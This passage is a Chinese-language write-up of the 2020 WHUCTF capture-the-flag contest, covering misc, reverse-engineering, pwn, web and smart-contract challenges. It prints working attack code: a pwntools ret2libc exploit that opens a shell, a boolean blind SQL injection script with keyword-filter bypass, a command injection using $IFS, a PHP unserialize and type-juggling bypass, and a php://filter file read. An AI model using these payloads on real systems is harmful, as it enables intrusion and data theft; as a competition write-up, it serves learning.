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";
$d6="5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6Nrmak6Hhj9PXx3ZlGnMIgkqnqHmf6ba5VvtRMgJP6wUtoMXx5WeYJvobewjKDmZ8sSUCZJhKzzkX2ISKKy/snPv+6UOh5rBo6j/JvFGUOUjkKCbCe+nEGD9EKyv10Uu9KHU=";
$r6=openssl_decrypt($d6, "AES128", $key);
    print($r6."\n");
print base64_decode("PD9waHAKCi8vJGZsYWcgPSAid2h1Y3Rme2NkNzY4ZWFjLTA3NDYtNDk3OS1hNDBkLTViNmEyNjljNGRkZX0iCj8+Cg==");
?>

按照這種思路繼續往下搜索，到第178個數據包時，對返回內容解密即可發現flag

$d6="5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6Nrmak6Hhj9PXx3ZlGnMIgkqnqHmf6ba5VvtRMgJP6wUtoMXx5WeYJvobewjKDmZ8sSUCZJhKzzkX2ISKKy/snPv+6UOh5rBo6j/JvFGUOUjkKCbCe+nEGD9EKyv10Uu9KHU=";
$r6=openssl_decrypt($d6, "AES128", $key);
    print($r6."\n");
print base64_decode("PD9waHAKCi8vJGZsYWcgPSAid2h1Y3Rme2NkNzY4ZWFjLTA3NDYtNDk3OS1hNDBkLTViNmEyNjljNGRkZX0iCj8+Cg==");

版權保護

給了一個壓縮包，裏面有兩個文件。打開後內容如下

用16進制編輯器查看沒有發現有價值的信息。
由中文聯想到寬字節隱寫
寬字節隱寫下，\u200d代表0 ，\u200c代表1
編寫腳本對文件進行提取

#coding=utf8
f=open('題目','r',encoding='utf8')
d=f.readline()
f.close()

i=0
dd=''
for x in d:
    if x =='\u200d':
        dd+= '0'
    elif x=='\u200c':
        dd+= '1'
    #i=i+1
f=open('res','w')
f.write(dd)
f.close()
#res
#01110111011010000111010101100011011101000110011001111011010110010011000001110101010111110110101101101110001100000111011101011111011010000011000001110111010111110111010000110000010111110111000001110010001100000111010001100101011000110111010000110001001100010011000101111101011101110110100001110101011000110111010001100110011110110101100100110000011101010101111101101011011011100011000001110111010111110110100000110000011101110101111101110100001100000101111101110000011100100011000001110100011001010110001101110100001100010011000100110001011111010111011101101000011101010110001101110100011001100111101101011001001100000111010101011111011010110110111000110000011101110101111101101000001100000111011101011111011101000011000001011111011100000111001000110000011101000110010101100011011101000011000100110001001100010111110101110111011010000111010101100011011101000110011001111011010110010011000001110101010111110110101101101110001100000111011101011111011010000011000001110111010111110111010000110000010111110111000001110010001100000111010001100101011000110111010000110001001100010011000101111101011101110110100001110101011000110111010001100110011110110101100100110000011101010101111101101011011011100011000001110111010111110110100000110000011101110101111101110100001100000101111101110000011100100011000001110100011001010110001101110100001100010011000100110001011111010111011101101000011101010110001101110100011001100111101101011001001100000111010101011111011010110110111000110000011101110101111101101000001100000111011101011111011101000011000001011111011100000111001000110000011101000110010101100011011101000011000100110001001100010111110101110111011010000111010101100011011101000110011001111011010110010011000001110101010111110110101101101110001100000111011101011111011010000011000001110111010111110111010000110000010111110111000001110010001100000111010001100101011000110111010000110001001100010011000101111101011101110110100001110101011000110111010001100110011110110101100100110000011101010101111101101011011011100011000001110111010111110110100000110000011101110101111101110100001100000101111101110000011100100011000001110100011001010110001101110100001100010011000100110001011111010111011101101000011101010110001101110100011001100111101101011001001100000111010101011111011010110110111000110000011101110101111101101000001100000111011101011111011101000011000001011111011100000111001000110000011101000110

將res內容當作比特串轉換爲ascii後得到

>>> binascii.unhexlify('7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f707230746563743131317d7768756374667b5930755f6b6e30775f6830775f74305f7072307460')
b'whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0tect111}whuctf{Y0u_kn0w_h0w_t0_pr0t`'
>>>

wechat

題目給了一個壓縮包，打開後結構如下

可以使用微信開發者程序中打開該工程。
模擬運行後，程序入口爲main.js。
分析main.js
找到了分數變化的函數

子彈擊中後會將分數加1。根據題目提示，改爲每次加10000，再次編譯運行，結束後得到flag

佛系青年

題目信息如下

之前做過類似的題，可在如下網址解碼佛語
http://www.keyfc.net/bbs/tools/tudoucode.aspx
得到字符串767566536773bf1ef643676363676784e1d015847635575637560ff4f41d

嘗試轉ascii，但失敗
嘗試古典密碼解密，發現柵欄密碼可以成功解密

0x3 re

whuer1.exe

動態調試後設置如下斷點
[Image: image.png]
分析程序作用，接受一個7字節的字符串，其中第5個數字要爲5
接着進行三輪判斷
判斷方式如下

d3 + d2 + d1 =15
d7 + d4 + d1 =15

d6 + d5 + d4 =15
d8 + d5 + d2 =15

d9 + d8 + d7 =15
d9 + d6 + d3 =15

其中di表示第i個字節，動態調試發現d8=9 d9=2 。所以可以進行枚舉，代碼如下。

for d1 in range(5,10):
    d2=1
    d3=14-d1
    d4=11-d1
    d5=5
    d6=d1-1
    d7=4
    print(d1,d2,d3,d4,d5,d6,d7)

有多組結果，但題中要求不重複數字，所以只有一組滿足要求。提交即可獲取flag。

whuer2.exe

三個關鍵函數

sub_AA1380 
SUB_AA1400
SUB_AA14B0

第一個函數用來對全局數據dowrd_AA6400進行初始化,，初始化時要提供一個初始變量a1

int  sub_AA1380(int a1)
{
  int result; // eax
  signed int i; // [esp+4h] [ebp-4h]

  dword_AA63F8 = 0;
  (dword_AA63FC) = 1;
  dword_AA6400[0] = a1;
  for ( i = 1; i < 624; ++i )
  {
    dword_AA6400[i] = i + 1812433253 * (dword_AA6400[i - 1] ^ (dword_AA6400[i - 1] >> 30));
    result = i + 1;
  }
  return result;
}

第二個函數對AA6400數組進行變化，並返回一個運算結果

int sub_AA1400()
{
  int result; // eax
  signed int v1; // ST04_4
  signed int i; // [esp+8h] [ebp-4h]

  for ( i = 0; i < 624; ++i )
  {
    v1 = (dword_AA6400[(i + 1) % 624] & 0x7FFFFFFF) + (dword_AA6400[i] & 0x80000000);
    dword_AA6400[i] = dword_AA6400[(i + 397) % 624] ^ (v1 >> 1);
    if ( v1 & 1 )
      dword_AA6400[i] ^= 0x9908B0DF;
    result = i + 1;
  }
  return result;
}

第三個函數會調用第二個函數，同樣根據AA00數組返回一個值

int sub_AA14B0()
{
  int v1; // eax
  int v2; // ST04_4
  signed int v3; // ST04_4

  // if ( !(char)(dword_AA63FC) )               // 如果AA63FC[0]==0，則調用aa1380對AA6400數組初始化
  // {
  //   v1 = sub_AA1360(0);
  //   sub_AA1380(v1);
  // }

  if ( !dword_AA63F8 )
    sub_AA1400();
  v2 = dword_AA6400[dword_AA63F8] ^ (dword_AA6400[dword_AA63F8] >> 11);
  v3 = v2 ^ (v2 << 7) & 0x9D2C5680 ^ ((v2 ^ (v2 << 7) & 0x9D2C5680) << 15) & 0xEFC60000;
  dword_AA63F8 = (dword_AA63F8 + 1) % 624;
  return v3 ^ (v3 >> 18);
}

程序判斷flag的代碼如下

經過分析，該代碼含義是用SUB_AA14B0函數的返回值循環和flag每個字節異或，將以或結果保存在buf1內存中，然後與buf2比較，一致則正確。
buf2是固定的，可以提取出來。所以只需要確定sub_AA14B0的返回值即可異或得到flag。
經過上述分析可知，SUB_AA14B0函數的返回值只與AA6400數組有關，該數組在初始變量的作用下經過會固定變化。所以只需要對初始變量進行爆破，然後進行異或，從而分析flag。
經過分析，程序是將flag的長度size作爲AA00數組的初始變量。所以對size進行爆破，如下

對size長度爆破，腳本

#include<stdio.h>
#include<stdlib.h>

int dword_AA63F8;
int dword_AA63FC;
int dword_AA6400[624];



int  sub_AA1380(int a1)
{
  int result; // eax
  signed int i; // [esp+4h] [ebp-4h]

  dword_AA63F8 = 0;
  (dword_AA63FC) = 1;
  dword_AA6400[0] = a1;
  for ( i = 1; i < 624; ++i )
  {
    dword_AA6400[i] = i + 1812433253 * (dword_AA6400[i - 1] ^ (dword_AA6400[i - 1] >> 30));
    result = i + 1;
  }
  return result;
}


int sub_AA1400()
{
  int result; // eax
  signed int v1; // ST04_4
  signed int i; // [esp+8h] [ebp-4h]

  for ( i = 0; i < 624; ++i )
  {
    v1 = (dword_AA6400[(i + 1) % 624] & 0x7FFFFFFF) + (dword_AA6400[i] & 0x80000000);
    dword_AA6400[i] = dword_AA6400[(i + 397) % 624] ^ (v1 >> 1);
    if ( v1 & 1 )
      dword_AA6400[i] ^= 0x9908B0DF;
    result = i + 1;
  }
  return result;
}

int sub_AA14B0()
{
  int v1; // eax
  int v2; // ST04_4
  signed int v3; // ST04_4

  // if ( !(char)(dword_AA63FC) )               // 如果AA63FC[0]==0，則調用aa1380對AA6400數組初始化
  // {
  //   v1 = sub_AA1360(0);
  //   sub_AA1380(v1);
  // }

  if ( !dword_AA63F8 )
    sub_AA1400();
  v2 = dword_AA6400[dword_AA63F8] ^ (dword_AA6400[dword_AA63F8] >> 11);
  v3 = v2 ^ (v2 << 7) & 0x9D2C5680 ^ ((v2 ^ (v2 << 7) & 0x9D2C5680) << 15) & 0xEFC60000;
  dword_AA63F8 = (dword_AA63F8 + 1) % 624;
  return v3 ^ (v3 >> 18);
}


int main() {

  int size;
  char v4;
  int v14;
  int i;

  char buf2[] = {0x43, 0xEB, 0xC5, 0x25, 0x5E, 0xC2, 0xDE, 0x1D, 0x7D, 0xE8, 0xD6, 0x1D, 0x66, 0xE8, 0xCA, 0x24, 0x50, 0xF4,
                 0xC1, 0x1D, 0x46, 0xE8, 0xCA, 0x26, 0x4C, 0xF3, 0xCD, 0x2D, 0x4B, 0xFA, 0x43, 0x49,
                 0x44, 0x66, 0x75, 0x32, 0x68, 0x90, 0xA8, 0xB3, 0xAB, 0xAB, 0xAB, 0xAB, 0xAB, 0xAB, 0xAB, 0xAB
                };
  char buf1[100];



  for (size = 0x1c; size < 0x20; size++) {
    dword_AA63F8 = 0;
    dword_AA63FC = 0;
    memset(dword_AA6400, 0, sizeof(dword_AA6400));
    memset(buf1, 0, sizeof(buf1));
    
    sub_AA1380(size);
    v14 = sub_AA14B0();


    for ( i = 0; i < size; ++i )
    {
      v4 = *((char*)&v14 + i % 4);
      //*((char *)Buf1 + i) = *(_BYTE *)sub_AA1850(&v13, i) ^ v4;// 偏移i個字節異或v5
      buf1[i] = buf2[i] ^ v4;
    }

    printf("test %d ==> %s\n", size, buf1);

  }


}

編譯運行

發現flag，提交即可。

0x4 pwn

pwnpwnpwn

ret2libc類型,利用system(“/bin/sh”)

先獲取system偏移地址
[Image: image.png]
bin/sh字符串地址
[Image: image.png]
libc_main偏移

libc基地址可由__libc_start_main地址-偏移得到
獲取l__libc_start_main地址腳本如下

from pwn import *

#context(os='linux', log_level='debug')
r = process('./pwn')

r=remote('218.197.154.9' ,'10004')
elf = ELF('./pwn')

write_plt = elf.plt['write']
libc_start_main_got = elf.got['__libc_start_main']
main = elf.symbols['main']

#執行write(1,libc_start_main_got,4)並返回到main函數
payload = 'a'*(0x88+4) + p32(write_plt) +p32(main) + p32(1)+p32(libc_start_main_got)+p32(4)
r.sendlineafter('Ready?\n',payload)

#實際地址
libc_start_main_addr = u32(r.recv()[0:4])
print('libc: '+hex(libc_start_main_addr))
libc_base = libc_start_main_addr - 0x18540
sys_offset = 0x3a940
sh = 0x15902b

#system("sh")
payload = 'a' * (0x88+4) + p32(sys_offset+libc_base) + p32(0xdeadbeef) + p32(sh+libc_base)

#print(r.recv())
r.sendlineafter('Ready?\n',payload)
r.interactive()

運行獲取flag

0x5 web

ezsqli

考察盲注知識
輸入用戶名admin’#密碼sss，提示登陸成功，並可以返回查詢sql語句，但不返回其他任何頁面。
輸入用戶名 admin 密碼sss，提示錯誤

注入成功後，頁面會返回success字樣，錯誤則無。可以據此作爲注入是否成功的標誌。
採用布爾盲注，利用ascii(substr())組合來逐位爆破數據庫、表名、列名以及字段

爆破腳本，需要注意該題還進行了黑名單過濾，可採用雙寫方式繞過，如selselectect。

import requests
url = 'http://218.197.154.9:10011/login.php#'

pwd='ssss'
username=''

#database name
def dabasename():
    database=''
    for a in range(12):
        # print(database)
        for i in range(128,0,-1):
            # print(chr(101))
            username="admin' and "+"ascii(substr(database(),{},1))<".format(len(database)+1)+str(i)+"#"
            # print(username)
            data={'user':username,'pass':pwd}

            r= requests.post(url,data)
            if 'success' not in r.text:
                database+=chr(i)
                print('database ==> ',database)
                break
#print(r.text)
database='eazy_sql'


def table_name():
    table_name_list=[]
    for a in range(5):
        table_name=''    
        for b in range(30):

            ori = len(table_name)
            for i in range(128,0,-1):
                # print(chr(101))
                username="admin' and "+"ascii(substr((selselectect table_name frfromom infoorrmation_schema.tables whwhereere table_schema='easy_sql1' limit {},1),{},1))<".format(len(table_name_list),len(table_name)+1)+str(i)+"#"
                #print(username)
                data={'user':username,'pass':pwd}

                r= requests.post(url,data)
                if 'success' not in r.text:
                    table_name+=chr(i)
                    
                    print('table_name ==> ',table_name)
                    #print(r.text)
                    break
                # if len(table_name)==ori:
                #     break        
        table_name_list.append(table_name)
    print(table_name_list)

def column_name():
    col_name_list=[]
    for a in range(5):
        col_name='f111114g'    
        for b in range(30):

            ori = len(col_name)
            for i in range(128,0,-1):
                # print(chr(101))
                username="admin' and "+"ascii(substr((selselectect column_name frfromom infoorrmation_schema.columns whwhereere table_name='f1ag_y0u_wi1l_n3ver_kn0w' limit {},1),{},1))<".format(len(col_name_list),len(col_name)+1)+str(i)+"#"
                #print(username)
                data={'user':username,'pass':pwd}

                r= requests.post(url,data)
                if 'success' not in r.text:
                    col_name+=chr(i)
                    
                    print('col_name ==> ',col_name)
                    #print(r.text)
                    break
                # if len(col_name)==ori:
                #     break        
        col_name_list.append(col_name)
    print(col_name_list)


def flag():
    col_name='f111114g'
    flag=''
    table_name='f1ag_y0u_wi1l_n3ver_kn0w'
    for b in range(30):

        ori = len(flag)
        for i in range(128,0,-1):
            # print(chr(101))
            username="admin' and "+"ascii(substr((selselectect {} frfromom {} limit 0,1),{},1))<".format(col_name,table_name,len(flag)+1)+str(i)+"#"
            #print(username)
            data={'user':username,'pass':pwd}

            r= requests.post(url,data)
            if 'success' not in r.text:
                flag+=chr(i)
                
                print('flag ==> ',flag)
                #print(r.text)
                break
            # if len(col_name)==ori:
            #     break        
    print(flag)



#dabasename()
#table_name()
#column_name()
flag()

ezphp

代碼審計
題目代碼如下

<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];

//1st
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
    echo '1st ok'."<br>";
}
else{
    die('會代碼審計嘛23333');
}


//2nd
if(is_numeric($string_1)){
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'pggnb', '12345');
        $b = strtr($md5_2, 'pggnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}

//3nd
function filter($string){
    return preg_replace('/x/', 'yy', $string);
}

$username = $_POST['username'];

$password = "aaaaa";
$user = array($username, $password);

$r = filter(serialize($user));
if(unserialize($r)[1] == "123456"){
    echo file_get_contents('flag.php');
}

分析可知，需要通過驗證條件，繞過方式如下

preg_match函數可通過換行繞過 http://218.197.154.9:10015/?num=23333%0a
php弱類型比較，0e+數字類型使用==時會被認爲相等。所以可以另md5_1的值以0e開頭，後面只含有字母b，md5_2以0e開頭，後面只含數字。這樣可以繞過md5_1 != md5_2，但通過str函數將b替換成5後，$a==$b，繞過驗證。
控制username=xxxxxxxxxxxxxxxxxxxx\";i:1;s:6:\"123456\";}，這樣經過filter函數將x替換成兩個y後，$r=a:2:{i:0;s:40:"yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}
unserialize就會只解析到123456處。，滿足條件

構造腳本

url = "http://218.197.154.9:10015/?num=23333%0a&str1=11230178&str2=QNKCDZO"
data={"username":"xxxxxxxxxxxxxxxxxxxx\";i:1;s:6:\"123456\";}"}
r =requests.post(url,data)
print(r.text)

運行即可獲取flag

ezcmd

有三處限制不能有空格、不能有f*l*a*g字樣，不能有cat等命令

繞過方式：

利用$IFS繞過空格限制
利用拼接方式繞過黑名單
使用腳本發送，即可獲得flag

腳本

url='http://218.197.154.9:10016?ip=127.0.0.1;ls$IFS-l;b=c;n=a;m=t;o=g;p=a;q=l;r=f;s=i;$b$n$m$IFS$r$q$p$o.php'
r =requests.get(url)
print(r.text)

ezinclude

留言界面

填寫後發送，返回頁面如下
[Image: image.png]
發現請求的url爲http://218.197.154.9:10017/thankyou.php?firstname=sss&lastname=sfsdf&country=australia&subject=sdsdfsdf

嘗試請求http://218.197.154.9:10017/thankyou.php?file=php://filter/read=convert.base64-encode/resource=flag.php
返回界面

發現可以讀取到文件。base64解碼得到flag

0x6 區塊鏈

智能合約？

題目給出solidity源碼

pragma solidity ^0.4.23;

/**
 * The CoinFlip contract does nothing...
 */
contract CoinFlip {
    uint256 lashHash;
    uint256 Factor = 20244007718664171871063861089;
    mapping (address => uint) balances;
    string flag;

    constructor (string _flag) public {
        flag = _flag;
    }
    
    function getBalance () public returns(uint) {
        return balances[tx.origin];
    }
    
    function flip(bool _guess) public returns (bool) {
        uint256 blockValue = uint256(block.blockhash(block.number - 1));
        lashHash = blockValue;
        uint256 ans = blockValue / Factor;
        bool side = ans == 1 ? true : false;

        if (side == _guess) {
            balances[tx.origin]++;
            return true;
        } else {
            balances[tx.origin] = 0;
            return false;
        }
    }

    function GetTheFlag() public view returns (string){
        return flag;  // You can get your flag here
    }
}

分析改源碼,有GetTheFlag函數，不不要任何require條件，直接返回flag。

在http://remix.ethereum.org/ 中編譯、部署。需要先登錄Ropsten 測試網絡賬戶

編譯部署好後點擊GetTheFlag按鈕即可獲得flag

2020_WHUCTF_Writeup（部分）

0x1 crypto

bvibvi

notrsa

aes

prism

0x2 misc

checkin

shellofawd

版權保護

wechat

佛系青年

0x3 re

whuer1.exe

whuer2.exe

0x4 pwn

pwnpwnpwn

0x5 web

ezsqli

ezphp

ezcmd

ezinclude

0x6 區塊鏈

智能合約？

DAPPER 事務 TRANSACTION

BUUCTF-CRYPTO 刷題記錄（一）

2020_WHUCTF_Writeup（部分）

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結